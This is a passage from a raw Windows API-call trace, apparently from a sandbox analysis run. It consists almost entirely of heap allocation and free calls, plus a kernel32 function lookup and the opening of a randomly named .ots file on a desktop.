(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.076] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.078] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889538 [0032.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889538, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.078] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0032.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.079] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0032.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab260 [0032.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", cchWideChar=58, lpMultiByteStr=0x7ab260, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpUsedDefaultChar=0x0) returned 58 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.080] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzgmnb4vwunbbj9.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0032.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=58, lpWideCharStr=0x7800d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots") returned 58 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 